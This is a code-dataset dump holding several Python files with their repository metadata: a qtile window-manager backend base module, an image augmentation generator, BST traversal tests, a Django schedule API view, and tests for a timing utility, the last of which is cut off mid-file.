hexsha stringlengths 40 40 | size int64 1 1.03M | ext stringclasses 10
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 3 239 | max_stars_repo_name stringlengths 5 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 239 | max_issues_repo_name stringlengths 5 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 239 | max_forks_repo_name stringlengths 5 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.03M | avg_line_length float64 1 958k | max_line_length int64 1 1.03M | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
795b8bb32f8e6bed3554493539946f65276bd359 | 18,517 | py | Python | libqtile/backend/base.py | ep12/qtile | 67f97604d9535c35eea459d7261adb4ece0980f8 | [
"MIT"
] | null | null | null | libqtile/backend/base.py | ep12/qtile | 67f97604d9535c35eea459d7261adb4ece0980f8 | [
"MIT"
] | null | null | null | libqtile/backend/base.py | ep12/qtile | 67f97604d9535c35eea459d7261adb4ece0980f8 | [
"MIT"
] | null | null | null | from __future__ import annotations
import contextlib
import enum
import math
import typing
from abc import ABCMeta, abstractmethod
import cairocffi
from libqtile import drawer, pangocffi, utils
from libqtile.command.base import CommandObject
if typing.TYPE_CHECKING:
from typing import Any, Dict, List, Optional, Tuple, Union
from libqtile import config
from libqtile.command.base import ItemT
from libqtile.core.manager import Qtile
from libqtile.group import _Group
from libqtile.utils import ColorType
class Core(metaclass=ABCMeta):
painter: Any
@property
@abstractmethod
def name(self) -> str:
"""The name of the backend"""
pass
@abstractmethod
def finalize(self):
"""Destructor/Clean up resources"""
@property
@abstractmethod
def display_name(self) -> str:
pass
@abstractmethod
def setup_listener(self, qtile: Qtile) -> None:
"""Setup a listener for the given qtile instance"""
@abstractmethod
def remove_listener(self) -> None:
"""Setup a listener for the given qtile instance"""
def update_desktops(self, groups: List[_Group], index: int) -> None:
"""Set the current desktops of the window manager"""
@abstractmethod
def get_screen_info(self) -> List[Tuple[int, int, int, int]]:
"""Get the screen information"""
@abstractmethod
def grab_key(self, key: Union[config.Key, config.KeyChord]) -> Tuple[int, int]:
"""Configure the backend to grab the key event"""
@abstractmethod
def ungrab_key(self, key: Union[config.Key, config.KeyChord]) -> Tuple[int, int]:
"""Release the given key event"""
@abstractmethod
def ungrab_keys(self) -> None:
"""Release the grabbed key events"""
@abstractmethod
def grab_button(self, mouse: config.Mouse) -> int:
"""Configure the backend to grab the mouse event"""
@abstractmethod
def ungrab_buttons(self) -> None:
"""Release the grabbed button events"""
@abstractmethod
def grab_pointer(self) -> None:
"""Configure the backend to grab mouse events"""
@abstractmethod
def ungrab_pointer(self) -> None:
"""Release grabbed pointer events"""
def scan(self) -> None:
"""Scan for clients if required."""
def warp_pointer(self, x: int, y: int) -> None:
"""Warp the pointer to the given coordinates relative."""
def update_client_list(self, windows_map: Dict[int, WindowType]) -> None:
"""Update the list of windows being managed"""
@contextlib.contextmanager
def masked(self):
"""A context manager to suppress window events while operating on many windows."""
yield
def create_internal(self, x: int, y: int, width: int, height: int) -> Internal:
"""Create an internal window controlled by Qtile."""
raise NotImplementedError # Only error when called, not when instantiating class
def flush(self) -> None:
"""If needed, flush the backend's event queue."""
def graceful_shutdown(self):
"""Try to close windows gracefully before exiting"""
def simulate_keypress(self, modifiers: List[str], key: str) -> None:
"""Simulate a keypress with given modifiers"""
def change_vt(self, vt: int) -> bool:
"""Change virtual terminal, returning success."""
return False
@enum.unique
class FloatStates(enum.Enum):
NOT_FLOATING = 1
FLOATING = 2
MAXIMIZED = 3
FULLSCREEN = 4
TOP = 5
MINIMIZED = 6
class _Window(CommandObject, metaclass=ABCMeta):
def __init__(self):
self.borderwidth: int = 0
self.name: str = "<no name>"
self.reserved_space: Optional[Tuple[int, int, int, int]] = None
self.defunct: bool = False
@property
@abstractmethod
def group(self) -> Optional[_Group]:
"""The group to which this window belongs."""
@property
@abstractmethod
def wid(self) -> int:
"""The unique window ID"""
@abstractmethod
def hide(self) -> None:
"""Hide the window"""
@abstractmethod
def unhide(self) -> None:
"""Unhide the window"""
@abstractmethod
def kill(self) -> None:
"""Kill the window"""
def get_wm_class(self) -> Optional[List]:
"""Return the class(es) of the window"""
return None
def get_wm_type(self) -> Optional[str]:
"""Return the type of the window"""
return None
def get_wm_role(self) -> Optional[str]:
"""Return the role of the window"""
return None
@property
def can_steal_focus(self):
"""Is it OK for this window to steal focus?"""
return True
def has_fixed_ratio(self) -> bool:
"""Does this window want a fixed aspect ratio?"""
return False
def has_fixed_size(self) -> bool:
"""Does this window want a fixed size?"""
return False
@property
def urgent(self):
"""Whether this window urgently wants focus"""
return False
@abstractmethod
def place(self, x, y, width, height, borderwidth, bordercolor,
above=False, margin=None, respect_hints=False):
"""Place the window in the given position."""
def _items(self, name: str) -> ItemT:
return None
def _select(self, name, sel):
return None
def info(self) -> Dict[str, Any]:
"""Return information on this window."""
return {}
class Window(_Window, metaclass=ABCMeta):
"""A regular Window belonging to a client."""
def __repr__(self):
return "Window(name=%r, wid=%i)" % (self.name, self.wid)
@property
def floating(self) -> bool:
"""Whether this window is floating."""
return False
@property
def maximized(self) -> bool:
"""Whether this window is maximized."""
return False
@property
def fullscreen(self) -> bool:
"""Whether this window is fullscreened."""
return False
@property
def wants_to_fullscreen(self) -> bool:
"""Does this window want to be fullscreen?"""
return False
def match(self, match: config.Match) -> bool:
"""Compare this window against a Match instance."""
return match.compare(self)
@abstractmethod
def focus(self, warp: bool) -> None:
"""Focus this window and optional warp the pointer to it."""
@abstractmethod
def togroup(
self, group_name: Optional[str] = None, *, switch_group: bool = False
) -> None:
"""Move window to a specified group
Also switch to that group if switch_group is True.
"""
@property
def has_focus(self):
return self == self.qtile.current_window
def has_user_set_position(self) -> bool:
"""Whether this window has user-defined geometry"""
return False
def is_transient_for(self) -> Optional["WindowType"]:
"""What window is this window a transient windor for?"""
return None
@abstractmethod
def get_pid(self) -> int:
"""Return the PID that owns the window."""
def paint_borders(self, color, width) -> None:
"""Paint the window borders with the given color and width"""
@abstractmethod
def cmd_focus(self, warp: Optional[bool] = None) -> None:
"""Focuses the window."""
@abstractmethod
def cmd_info(self) -> Dict:
"""Return a dictionary of info."""
@abstractmethod
def cmd_get_position(self) -> Tuple[int, int]:
"""Get the (x, y) of the window"""
@abstractmethod
def cmd_get_size(self) -> Tuple[int, int]:
"""Get the (width, height) of the window"""
@abstractmethod
def cmd_move_floating(self, dx: int, dy: int) -> None:
"""Move window by dx and dy"""
@abstractmethod
def cmd_resize_floating(self, dw: int, dh: int) -> None:
"""Add dw and dh to size of window"""
@abstractmethod
def cmd_set_position_floating(self, x: int, y: int) -> None:
"""Move window to x and y"""
@abstractmethod
def cmd_set_size_floating(self, w: int, h: int) -> None:
"""Set window dimensions to w and h"""
@abstractmethod
def cmd_place(self, x, y, width, height, borderwidth, bordercolor,
above=False, margin=None) -> None:
"""Place the window with the given position and geometry."""
@abstractmethod
def cmd_toggle_floating(self) -> None:
"""Toggle the floating state of the window."""
@abstractmethod
def cmd_enable_floating(self) -> None:
"""Float the window."""
@abstractmethod
def cmd_disable_floating(self) -> None:
"""Tile the window."""
@abstractmethod
def cmd_toggle_maximize(self) -> None:
"""Toggle the fullscreen state of the window."""
@abstractmethod
def cmd_toggle_fullscreen(self) -> None:
"""Toggle the fullscreen state of the window."""
@abstractmethod
def cmd_enable_fullscreen(self) -> None:
"""Fullscreen the window"""
@abstractmethod
def cmd_disable_fullscreen(self) -> None:
"""Un-fullscreen the window"""
@abstractmethod
def cmd_bring_to_front(self) -> None:
"""Bring the window to the front"""
def cmd_togroup(
self, group_name: Optional[str] = None, *, switch_group: bool = False
) -> None:
"""Move window to a specified group
Also switch to that group if switch_group is True.
"""
self.togroup(group_name, switch_group=switch_group)
def cmd_opacity(self, opacity):
"""Set the window's opacity"""
if opacity < .1:
self.opacity = .1
elif opacity > 1:
self.opacity = 1
else:
self.opacity = opacity
def cmd_down_opacity(self):
"""Decrease the window's opacity"""
if self.opacity > .2:
# don't go completely clear
self.opacity -= .1
else:
self.opacity = .1
def cmd_up_opacity(self):
"""Increase the window's opacity"""
if self.opacity < .9:
self.opacity += .1
else:
self.opacity = 1
@abstractmethod
def cmd_kill(self) -> None:
"""Kill the window. Try to be polite."""
class Internal(_Window, metaclass=ABCMeta):
"""An Internal window belonging to Qtile."""
def __repr__(self):
return "Internal(wid=%s)" % self.wid
@abstractmethod
def create_drawer(self, width: int, height: int) -> Drawer:
"""Create a Drawer that draws to this window."""
def process_window_expose(self) -> None:
"""Respond to the window being exposed. Required by X11 backend."""
def process_button_click(self, x: int, y: int, button: int) -> None:
"""Handle a pointer button click."""
def process_button_release(self, x: int, y: int, button: int) -> None:
"""Handle a pointer button release."""
def process_pointer_enter(self, x: int, y: int) -> None:
"""Handle the pointer entering the window."""
def process_pointer_leave(self, x: int, y: int) -> None:
"""Handle the pointer leaving the window."""
def process_pointer_motion(self, x: int, y: int) -> None:
"""Handle pointer motion within the window."""
class Static(_Window, metaclass=ABCMeta):
"""A Window not bound to a single Group."""
screen: config.Screen
def __repr__(self):
return "Static(name=%r, wid=%s)" % (self.name, self.wid)
WindowType = typing.Union[Window, Internal, Static]
class Drawer:
"""A helper class for drawing to Internal windows.
We stage drawing operations locally in memory using a cairo RecordingSurface before
finally drawing all operations to a backend-specific target.
"""
def __init__(self, qtile: Qtile, win: Internal, width: int, height: int):
self.qtile = qtile
self._win = win
self._width = width
self._height = height
self.surface: cairocffi.RecordingSurface
self.ctx: cairocffi.Context
self._reset_surface()
self.clear((0, 0, 1))
def finalize(self):
"""Destructor/Clean up resources"""
self.surface = None
self.ctx = None
@property
def width(self) -> int:
return self._width
@width.setter
def width(self, width: int):
self._width = width
@property
def height(self) -> int:
return self._height
@height.setter
def height(self, height: int):
self._height = height
def _reset_surface(self):
"""This creates a fresh surface and cairo context."""
self.surface = cairocffi.RecordingSurface(
cairocffi.CONTENT_COLOR_ALPHA,
None,
)
self.ctx = self.new_ctx()
def paint_to(self, drawer: Drawer) -> None:
"""Paint to another Drawer instance"""
def _rounded_rect(self, x, y, width, height, linewidth):
aspect = 1.0
corner_radius = height / 10.0
radius = corner_radius / aspect
degrees = math.pi / 180.0
self.ctx.new_sub_path()
delta = radius + linewidth / 2
self.ctx.arc(x + width - delta, y + delta, radius,
-90 * degrees, 0 * degrees)
self.ctx.arc(x + width - delta, y + height - delta,
radius, 0 * degrees, 90 * degrees)
self.ctx.arc(x + delta, y + height - delta, radius,
90 * degrees, 180 * degrees)
self.ctx.arc(x + delta, y + delta, radius,
180 * degrees, 270 * degrees)
self.ctx.close_path()
def rounded_rectangle(self, x: int, y: int, width: int, height: int, linewidth: int):
self._rounded_rect(x, y, width, height, linewidth)
self.ctx.set_line_width(linewidth)
self.ctx.stroke()
def rounded_fillrect(self, x: int, y: int, width: int, height: int, linewidth: int):
self._rounded_rect(x, y, width, height, linewidth)
self.ctx.fill()
def rectangle(self, x: int, y: int, width: int, height: int, linewidth: int = 2):
self.ctx.set_line_width(linewidth)
self.ctx.rectangle(x, y, width, height)
self.ctx.stroke()
def fillrect(self, x: int, y: int, width: int, height: int, linewidth: int = 2):
self.ctx.set_line_width(linewidth)
self.ctx.rectangle(x, y, width, height)
self.ctx.fill()
self.ctx.stroke()
def draw(
self,
offsetx: int = 0,
offsety: int = 0,
width: Optional[int] = None,
height: Optional[int] = None,
):
"""
This draws our cached operations to the Internal window.
Parameters
==========
offsetx :
the X offset to start drawing at.
offsety :
the Y offset to start drawing at.
width :
the X portion of the canvas to draw at the starting point.
height :
the Y portion of the canvas to draw at the starting point.
"""
def new_ctx(self):
return pangocffi.patch_cairo_context(cairocffi.Context(self.surface))
def set_source_rgb(self, colour: ColorType):
if type(colour) == list:
if len(colour) == 0:
# defaults to black
self.ctx.set_source_rgba(*utils.rgb("#000000"))
elif len(colour) == 1:
self.ctx.set_source_rgba(*utils.rgb(colour[0]))
else:
linear = cairocffi.LinearGradient(0.0, 0.0, 0.0, self.height)
step_size = 1.0 / (len(colour) - 1)
step = 0.0
for c in colour:
rgb_col = utils.rgb(c)
if len(rgb_col) < 4:
rgb_col[3] = 1
linear.add_color_stop_rgba(step, *rgb_col)
step += step_size
self.ctx.set_source(linear)
else:
self.ctx.set_source_rgba(*utils.rgb(colour))
def clear(self, colour):
self.set_source_rgb(colour)
self.ctx.rectangle(0, 0, self.width, self.height)
self.ctx.fill()
self.ctx.stroke()
def textlayout(
self, text, colour, font_family, font_size, font_shadow, markup=False, **kw
):
"""Get a text layout"""
textlayout = drawer.TextLayout(
self, text, colour, font_family, font_size, font_shadow, markup=markup, **kw
)
return textlayout
def max_layout_size(self, texts, font_family, font_size):
sizelayout = self.textlayout("", "ffffff", font_family, font_size, None)
widths, heights = [], []
for i in texts:
sizelayout.text = i
widths.append(sizelayout.width)
heights.append(sizelayout.height)
return max(widths), max(heights)
def text_extents(self, text):
return self.ctx.text_extents(utils.scrub_to_utf8(text))
def font_extents(self):
return self.ctx.font_extents()
def fit_fontsize(self, heightlimit):
"""Try to find a maximum font size that fits any strings within the height"""
self.ctx.set_font_size(heightlimit)
asc, desc, height, _, _ = self.font_extents()
self.ctx.set_font_size(
int(heightlimit * heightlimit / height))
return self.font_extents()
def fit_text(self, strings, heightlimit):
"""Try to find a maximum font size that fits all strings within the height"""
self.ctx.set_font_size(heightlimit)
_, _, _, maxheight, _, _ = self.ctx.text_extents("".join(strings))
if not maxheight:
return 0, 0
self.ctx.set_font_size(
int(heightlimit * heightlimit / maxheight))
maxwidth, maxheight = 0, 0
for i in strings:
_, _, x, y, _, _ = self.ctx.text_extents(i)
maxwidth = max(maxwidth, x)
maxheight = max(maxheight, y)
return maxwidth, maxheight
def draw_vbar(self, color, x, y1, y2, linewidth=1):
self.set_source_rgb(color)
self.ctx.move_to(x, y1)
self.ctx.line_to(x, y2)
self.ctx.set_line_width(linewidth)
self.ctx.stroke()
def draw_hbar(self, color, x1, x2, y, linewidth=1):
self.set_source_rgb(color)
self.ctx.move_to(x1, y)
self.ctx.line_to(x2, y)
self.ctx.set_line_width(linewidth)
self.ctx.stroke()
| 30.306056 | 90 | 0.604688 |
795b8d55bd5f2826e7067585e8e2ab9c10e823c1 | 10,394 | py | Python | src/utils/data_augmentation.py | gourav287/Gender-Emotion-Recognition | d6f19310270fd5d107db333439a0b942c8b41d66 | [
"MIT"
] | 1 | 2021-07-05T09:32:34.000Z | 2021-07-05T09:32:34.000Z | src/utils/data_augmentation.py | gourav287/Gender-Emotion-Recognition | d6f19310270fd5d107db333439a0b942c8b41d66 | [
"MIT"
] | null | null | null | src/utils/data_augmentation.py | gourav287/Gender-Emotion-Recognition | d6f19310270fd5d107db333439a0b942c8b41d66 | [
"MIT"
] | 1 | 2021-05-12T05:12:04.000Z | 2021-05-12T05:12:04.000Z | import numpy as np
from random import shuffle
from .preprocessor import preprocess_input
from .preprocessor import _imread as imread
from .preprocessor import _imresize as imresize
from .preprocessor import to_categorical
import scipy.ndimage as ndi
import cv2
class ImageGenerator(object):
""" Image generator with saturation, brightness, lighting, contrast,
horizontal flip and vertical flip transformations. It supports
bounding boxes coordinates.
TODO:
- Finish support for not using bounding_boxes
- Random crop
- Test other transformations
"""
def __init__(self, ground_truth_data, batch_size, image_size,
train_keys, validation_keys,
ground_truth_transformer=None,
path_prefix=None,
saturation_var=0.5,
brightness_var=0.5,
contrast_var=0.5,
lighting_std=0.5,
horizontal_flip_probability=0.5,
vertical_flip_probability=0.5,
do_random_crop=False,
grayscale=False,
zoom_range=[0.75, 1.25],
translation_factor=.3):
self.ground_truth_data = ground_truth_data
self.ground_truth_transformer = ground_truth_transformer
self.batch_size = batch_size
self.path_prefix = path_prefix
self.train_keys = train_keys
self.validation_keys = validation_keys
self.image_size = image_size
self.grayscale = grayscale
self.color_jitter = []
if saturation_var:
self.saturation_var = saturation_var
self.color_jitter.append(self.saturation)
if brightness_var:
self.brightness_var = brightness_var
self.color_jitter.append(self.brightness)
if contrast_var:
self.contrast_var = contrast_var
self.color_jitter.append(self.contrast)
self.lighting_std = lighting_std
self.horizontal_flip_probability = horizontal_flip_probability
self.vertical_flip_probability = vertical_flip_probability
self.do_random_crop = do_random_crop
self.zoom_range = zoom_range
self.translation_factor = translation_factor
def _do_random_crop(self, image_array):
"""IMPORTANT: random crop only works for classification since the
current implementation does no transform bounding boxes"""
height = image_array.shape[0]
width = image_array.shape[1]
x_offset = np.random.uniform(0, self.translation_factor * width)
y_offset = np.random.uniform(0, self.translation_factor * height)
offset = np.array([x_offset, y_offset])
scale_factor = np.random.uniform(self.zoom_range[0],
self.zoom_range[1])
crop_matrix = np.array([[scale_factor, 0],
[0, scale_factor]])
image_array = np.rollaxis(image_array, axis=-1, start=0)
image_channel = [ndi.interpolation.affine_transform(image_channel,
crop_matrix, offset=offset, order=0, mode='nearest',
cval=0.0) for image_channel in image_array]
image_array = np.stack(image_channel, axis=0)
image_array = np.rollaxis(image_array, 0, 3)
return image_array
def do_random_rotation(self, image_array):
"""IMPORTANT: random rotation only works for classification since the
current implementation does no transform bounding boxes"""
height = image_array.shape[0]
width = image_array.shape[1]
x_offset = np.random.uniform(0, self.translation_factor * width)
y_offset = np.random.uniform(0, self.translation_factor * height)
offset = np.array([x_offset, y_offset])
scale_factor = np.random.uniform(self.zoom_range[0],
self.zoom_range[1])
crop_matrix = np.array([[scale_factor, 0],
[0, scale_factor]])
image_array = np.rollaxis(image_array, axis=-1, start=0)
image_channel = [ndi.interpolation.affine_transform(image_channel,
crop_matrix, offset=offset, order=0, mode='nearest',
cval=0.0) for image_channel in image_array]
image_array = np.stack(image_channel, axis=0)
image_array = np.rollaxis(image_array, 0, 3)
return image_array
def _gray_scale(self, image_array):
return image_array.dot([0.299, 0.587, 0.114])
def saturation(self, image_array):
gray_scale = self._gray_scale(image_array)
alpha = 2.0 * np.random.random() * self.brightness_var
alpha = alpha + 1 - self.saturation_var
image_array = (alpha * image_array + (1 - alpha) *
gray_scale[:, :, None])
return np.clip(image_array, 0, 255)
def brightness(self, image_array):
alpha = 2 * np.random.random() * self.brightness_var
alpha = alpha + 1 - self.saturation_var
image_array = alpha * image_array
return np.clip(image_array, 0, 255)
def contrast(self, image_array):
gray_scale = (self._gray_scale(image_array).mean() *
np.ones_like(image_array))
alpha = 2 * np.random.random() * self.contrast_var
alpha = alpha + 1 - self.contrast_var
image_array = image_array * alpha + (1 - alpha) * gray_scale
return np.clip(image_array, 0, 255)
def lighting(self, image_array):
covariance_matrix = np.cov(image_array.reshape(-1, 3) /
255.0, rowvar=False)
eigen_values, eigen_vectors = np.linalg.eigh(covariance_matrix)
noise = np.random.randn(3) * self.lighting_std
noise = eigen_vectors.dot(eigen_values * noise) * 255
image_array = image_array + noise
return np.clip(image_array, 0, 255)
def horizontal_flip(self, image_array, box_corners=None):
if np.random.random() < self.horizontal_flip_probability:
image_array = image_array[:, ::-1]
if box_corners is not None:
box_corners[:, [0, 2]] = 1 - box_corners[:, [2, 0]]
return image_array, box_corners
def vertical_flip(self, image_array, box_corners=None):
if (np.random.random() < self.vertical_flip_probability):
image_array = image_array[::-1]
if box_corners is not None:
box_corners[:, [1, 3]] = 1 - box_corners[:, [3, 1]]
return image_array, box_corners
def transform(self, image_array, box_corners=None):
shuffle(self.color_jitter)
for jitter in self.color_jitter:
image_array = jitter(image_array)
if self.lighting_std:
image_array = self.lighting(image_array)
if self.horizontal_flip_probability > 0:
image_array, box_corners = self.horizontal_flip(image_array,
box_corners)
if self.vertical_flip_probability > 0:
image_array, box_corners = self.vertical_flip(image_array,
box_corners)
return image_array, box_corners
def preprocess_images(self, image_array):
return preprocess_input(image_array)
def flow(self, mode='train'):
while True:
if mode == 'train':
shuffle(self.train_keys)
keys = self.train_keys
elif mode == 'val' or mode == 'demo':
shuffle(self.validation_keys)
keys = self.validation_keys
else:
raise Exception('invalid mode: %s' % mode)
inputs = []
targets = []
for key in keys:
image_path = self.path_prefix + key
image_array = imread(image_path)
image_array = imresize(image_array, self.image_size)
num_image_channels = len(image_array.shape)
if num_image_channels != 3:
continue
ground_truth = self.ground_truth_data[key]
'''if self.do_random_crop:
image_array = self._do_random_crop(image_array)'''
image_array = image_array.astype('float32')
if mode == 'train' or mode == 'demo':
if self.ground_truth_transformer is not None:
image_array, ground_truth = self.transform(
image_array,
ground_truth)
ground_truth = (
self.ground_truth_transformer.assign_boxes(
ground_truth))
else:
image_array = self.transform(image_array)[0]
if self.grayscale:
image_array = cv2.cvtColor(
image_array.astype('uint8'),
cv2.COLOR_RGB2GRAY).astype('float32')
image_array = np.expand_dims(image_array, -1)
inputs.append(image_array)
targets.append(ground_truth)
if len(targets) == self.batch_size:
inputs = np.asarray(inputs)
targets = np.asarray(targets)
# this will not work for boxes
targets = to_categorical(targets)
if mode == 'train' or mode == 'val':
inputs = self.preprocess_images(inputs)
yield self._wrap_in_dictionary(inputs, targets)
if mode == 'demo':
yield self._wrap_in_dictionary(inputs, targets)
inputs = []
targets = []
def _wrap_in_dictionary(self, image_array, targets):
return [{'input_1': image_array},
{'predictions': targets}]
| 43.48954 | 77 | 0.564941 |
795b8da854ab86fa605d82236c70e3dbcf2c0bce | 728 | py | Python | code-challenges-401/tree/test_breadth_first.py | arensdj/data-structures-and-algorithms | 8f965a147b4e02f88dbf9b9b01f805221e0a738a | [
"MIT"
] | null | null | null | code-challenges-401/tree/test_breadth_first.py | arensdj/data-structures-and-algorithms | 8f965a147b4e02f88dbf9b9b01f805221e0a738a | [
"MIT"
] | null | null | null | code-challenges-401/tree/test_breadth_first.py | arensdj/data-structures-and-algorithms | 8f965a147b4e02f88dbf9b9b01f805221e0a738a | [
"MIT"
] | null | null | null | from tree import BinarySearchTree
def test_preorder_traversal():
tree = BinarySearchTree()
tree.add(25)
tree.add(15)
tree.add(35)
tree.add(8)
tree.add(19)
tree.add(30)
tree.add(45)
expected = [25, 15, 8, 19, 35, 30, 45]
result = []
result = tree.get_pre_order_data()
assert result == expected
def test_breadth_order_traversal():
tree = BinarySearchTree()
tree.add(25)
tree.add(15)
tree.add(35)
tree.add(8)
tree.add(19)
tree.add(30)
tree.add(45)
expected = [25, 15, 35, 8, 19, 30, 45]
result = []
# result = tree.binary_tree.breadth_first_traversal(None)
result = tree.get_breadth_order_data()
assert result == expected
| 19.675676 | 61 | 0.622253 |
795b8e4ebb50e0343f2a6950b3473624eddc4790 | 3,754 | py | Python | schedule/views.py | yuking11/schedule-cms-server | 9c7bb56aa5251e91e05d4ec49eb4fc70f661ba3e | [
"MIT"
] | null | null | null | schedule/views.py | yuking11/schedule-cms-server | 9c7bb56aa5251e91e05d4ec49eb4fc70f661ba3e | [
"MIT"
] | null | null | null | schedule/views.py | yuking11/schedule-cms-server | 9c7bb56aa5251e91e05d4ec49eb4fc70f661ba3e | [
"MIT"
] | null | null | null | from django.shortcuts import render
from .models import Schedule
from .serializers import ScheduleSerializer
from rest_framework import generics
from rest_framework.views import APIView
from rest_framework.response import Response
from datetime import datetime, date, timedelta
from dateutil.relativedelta import relativedelta
from drf_yasg.utils import swagger_auto_schema
from drf_yasg import openapi
class ScheduleView(generics.ListCreateAPIView):
# class ScheduleView(APIView):
"""スケジュール管理API"""
queryset = Schedule.objects.all()
serializer_class = ScheduleSerializer
def get_queryset(self):
queryset = Schedule.objects.all()
limit = self.request.GET.get('limit')
limit = int(limit) if limit is not None else limit
year = self.request.GET.get('year')
year = int(year) if year is not None else year
month = self.request.GET.get('month')
month = int(month) if month is not None else month
day = self.request.GET.get('day')
day = int(day) if day is not None else day
today = date.today()
if limit is not None:
if year is not None and month is not None and day is not None:
start_date = datetime(year, month, day)
end_date = start_date + timedelta(days=limit-1)
queryset = queryset.filter(event_date__date__range=(start_date, end_date))
elif year is not None and month is not None:
start_date = datetime(year, month, 1)
end_date = start_date + relativedelta(months=limit, days=-1)
queryset = queryset.filter(event_date__date__range=(start_date, end_date))
elif day is not None:
start_date = datetime(today.year, today.month, day)
end_date = start_date + timedelta(days=limit-1)
queryset = queryset.filter(event_date__date__range=(start_date, end_date))
elif month is not None:
start_date = datetime(today.year, month, 1)
end_date = start_date + relativedelta(months=limit, days=-1)
queryset = queryset.filter(event_date__date__range=(start_date, end_date))
elif year is not None:
start_date = datetime(year, 1, 1)
end_date = start_date + relativedelta(years=limit, days=-1)
queryset = queryset.filter(event_date__date__range=(start_date, end_date))
else:
if year is not None:
queryset = queryset.filter(event_date__year=year)
else:
queryset = queryset.filter(event_date__year=today.year)
if month is not None:
queryset = queryset.filter(event_date__month=month)
if day is not None:
queryset = queryset.filter(event_date__day=day)
return queryset.order_by('event_date')
limit_param = openapi.Parameter(
'limit', openapi.IN_QUERY, description='取得件数', type=openapi.TYPE_NUMBER
)
year_param = openapi.Parameter(
'year', openapi.IN_QUERY, description='開催年', type=openapi.TYPE_NUMBER
)
month_param = openapi.Parameter(
'month', openapi.IN_QUERY, description='開催月', type=openapi.TYPE_NUMBER
)
day_param = openapi.Parameter(
'day', openapi.IN_QUERY, description='開催日付', type=openapi.TYPE_NUMBER
)
@swagger_auto_schema(manual_parameters=[limit_param, year_param, month_param, day_param])
def get(self, request, *args, **kwargs):
return self.list(request, *args, **kwargs)
class ScheduleDetailView(generics.RetrieveUpdateDestroyAPIView):
"""スケジュール管理API"""
queryset = Schedule.objects.all()
serializer_class = ScheduleSerializer
| 42.179775 | 93 | 0.658764 |
795b8efa3b3f2a8216416847a6168ffe12a0aaad | 5,079 | py | Python | test/test_clocked.py | JesseBuesking/clocked | cc7967031c0d4b5685fbbf636180a694364bcff4 | [
"MIT"
] | 2 | 2015-01-07T06:21:34.000Z | 2016-05-30T03:12:38.000Z | test/test_clocked.py | JesseBuesking/clocked | cc7967031c0d4b5685fbbf636180a694364bcff4 | [
"MIT"
] | null | null | null | test/test_clocked.py | JesseBuesking/clocked | cc7967031c0d4b5685fbbf636180a694364bcff4 | [
"MIT"
] | null | null | null | """ Tests for Clocked. """
from time import sleep
import unittest
# noinspection PyDocstring
from clocked.clockit import Clocked
from clocked.decorators import clocked
class TestClocked(unittest.TestCase):
def _assert(self, mini, val, maxi):
self.assertTrue(
mini <= val <= maxi,
'{} <= {} <= {} is not true'.format(
mini,
val,
maxi
)
)
def ten_ms(self):
sleep(.01)
# def template(self):
# Clocked.initialize('template')
# # time stuff
# with Clocked('a'):
# # time something
# pass
# # print report
# Profiler.print_hotspot_report()
def test_raw_simple(self):
""" Simple raw test using Clocked object. """
Clocked.initialize('test raw simple')
with Clocked('loop 1'):
for i in range(4):
with Clocked('loop 2'):
for j in range(2):
with Clocked('loop 3'):
for j in range(2):
self.ten_ms()
for j in range(2):
with Clocked('loop 4'):
for j in range(2):
self.ten_ms()
expected_total_time = 320
delta_upper_bound = 10
Clocked.verbose_report()
Clocked.hotspot_report()
print('')
total = 0.0
for timing in Clocked.get('loop 3'):
total += timing.duration_milliseconds
d = delta_upper_bound / 2
e = expected_total_time / 2
self._assert(e - d, total, e + d)
total = 0.0
for timing in Clocked.get('loop 4'):
total += timing.duration_milliseconds
d = delta_upper_bound / 2
e = expected_total_time / 2
self._assert(e - d, total, e + d)
total = 0.0
for timing in Clocked.get('loop 2'):
total += timing.duration_milliseconds
d = delta_upper_bound
e = expected_total_time
self._assert(e - d, total, e + d)
def test_raise(self):
def raises():
with Clocked('test exception'):
raise ValueError('some value error')
self.assertRaises(ValueError, raises)
# noinspection PyDocstring
class TestDecorators(unittest.TestCase):
def _assert(self, mini, val, maxi):
self.assertTrue(
mini <= val <= maxi,
'{} <= {} <= {} is not true'.format(
mini,
val,
maxi
)
)
def test_function_decorator(self):
Clocked.initialize('test function decorator')
TestDecorators.TestFunctionObj.delay_method()
t = [i for i in Clocked.get('test_clocked.delay_method.*')]
self.assertEqual(1, len(t))
t = t[0]
self._assert(20-2, t.duration_milliseconds, 20+2)
# noinspection PyDocstring
class TestFunctionObj(object):
@classmethod
@clocked
def delay_method(cls):
sleep(.02)
def test_class_decorator(self):
Clocked.initialize('test class decorator')
TestDecorators.TestClassObj.delay_method()
t = [i for i in Clocked.get('.*delay_method.*')]
self.assertEqual(1, len(t))
t = t[0]
self._assert(20-2, t.duration_milliseconds, 20+2)
# noinspection PyDocstring
@clocked
class TestClassObj(object):
@classmethod
def delay_method(cls):
sleep(.02)
def test_function_and_class_decorators(self):
Clocked.initialize('test function and class decorators')
TestDecorators.TestFunctionAndClassObj.delay_method()
t = [i for i in Clocked.get('.*delay_method.*')]
self.assertEqual(1, len(t))
t = t[0]
self._assert(20-2, t.duration_milliseconds, 20+2)
# noinspection PyDocstring
class TestFunctionAndClassObj(object):
@classmethod
@clocked
def delay_method(cls):
sleep(.02)
def test_not_classmethods(self):
Clocked.initialize('test function and class decorators')
to = TestDecorators.TestNotClassmethods()
to.delay_method()
t = [i for i in Clocked.get('.*delay_method.*')]
self.assertEqual(1, len(t))
t = t[0]
self._assert(20-2, t.duration_milliseconds, 20+2)
# noinspection PyDocstring
@clocked
